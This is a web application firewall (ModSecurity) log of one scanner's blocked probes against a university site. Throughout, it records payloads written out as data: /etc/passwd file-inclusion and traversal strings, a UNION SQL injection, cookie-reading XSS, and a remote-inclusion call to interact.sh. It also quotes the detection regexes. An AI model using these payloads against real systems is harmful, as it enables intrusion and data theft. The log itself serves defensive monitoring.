[Tue Aug 29 11:53:24.753038 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAn405sAAAAW"]
[Tue Aug 29 11:53:25.673070 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAofm7cAAAAX"]
[Tue Aug 29 11:53:25.692778 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAox7GsAAAAN"]
[Tue Aug 29 11:53:27.206584 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoyGzQAAAAI"]
[Tue Aug 29 11:53:27.559443 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAni-EgAAAAU"]
[Tue Aug 29 11:53:28.102826 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAni-E0AAAAU"]
[Tue Aug 29 11:53:28.113030 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAox7HMAAAAN"]
[Tue Aug 29 11:53:28.815637 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAox7HQAAAAN"]
[Tue Aug 29 11:53:28.821598 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoLfT0AAAAG"]
[Tue Aug 29 11:53:28.915470 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAoLfT4AAAAG"]
[Tue Aug 29 11:53:30.595126 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchinput. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe2\\x80\\x9c/>< found within ARGS:searchinput: \\xe2\\x80\\x9c/><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/search-locker-details.php"] [unique_id "ZO15ysCo-f0AAAoW7Q4AAAAJ"]
[Tue Aug 29 11:53:31.233581 2023] [:error] [pid 2610] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15y8Co-f0AAAoyGz8AAAAI"]
[Tue Aug 29 11:53:33.645330 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expertise. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:expertise: Heart' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/patient/search_result.php"] [unique_id "ZO15zcCo-f0AAAo2m4gAAAAA"]
[Tue Aug 29 11:53:34.022468 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout_settings_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout_settings_id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/page-layout-builder/includes/layout-settings.php"] [unique_id "ZO15zsCo-f0AAAoLfU8AAAAG"]
[Tue Aug 29 11:53:35.972016 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO15z8Co-f0AAAoW7SMAAAAJ"]
[Tue Aug 29 11:53:37.329175 2023] [:error] [pid 2615] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:yuzo_related_post_css_and_style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:yuzo_related_post_css_and_style: </style><script>alert(0);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO150cCo-f0AAAo3IfEAAAAa"]
[Tue Aug 29 11:53:39.091915 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO1508Co-f0AAAoAk1cAAAAC"]
[Tue Aug 29 11:53:41.932797 2023] [:error] [pid 2633] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:tag: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151cCo-f0AAApJDSQAAAAY"]
[Tue Aug 29 11:53:42.551714 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:itemid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:itemid: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php"] [unique_id "ZO151sCo-f0AAAoW7TcAAAAJ"]
[Tue Aug 29 11:53:42.813698 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:theme_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:theme_id: \\x22 onmouseover=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO151sCo-f0AAAoz74UAAAAS"]
[Tue Aug 29 11:53:43.715854 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:gallery_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:gallery_id: 1\\x22 onmouseover=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO1518Co-f0AAAoLfWgAAAAG"]
[Tue Aug 29 11:53:43.767057 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:toast. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:toast: </script><script>alert(document.cookie);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1518Co-f0AAAfWOZsAAAAL"]
[Tue Aug 29 11:53:45.535489 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/novius-os/admin/nos/login"] [unique_id "ZO152cCo-f0AAAot8TAAAAAn"]
[Tue Aug 29 11:53:45.543819 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:?script:setdb('snmp','syscontact'). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:?script:setdb('snmp','syscontact'): \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/config/pw_snmp_done.html"] [unique_id "ZO152cCo-f0AAAox7JkAAAAN"]
[Tue Aug 29 11:53:45.672022 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/alert-before-your-post/trunk/post_alert.php"] [unique_id "ZO152cCo-f0AAAoLfW8AAAAG"]
[Tue Aug 29 11:53:47.043863 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php"] [unique_id "ZO1528Co-f0AAAoGFfMAAAAE"]
[Tue Aug 29 11:53:48.071856 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:return_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:return_url: javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO153MCo-f0AAAolKZ0AAAAe"]
[Tue Aug 29 11:53:50.799527 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php"] [unique_id "ZO153sCo-f0AAAox7K4AAAAN"]
[Tue Aug 29 11:53:51.705054 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:artname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:artname: <img src=1 onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/product.php"] [unique_id "ZO1538Co-f0AAAo2m7sAAAAA"]
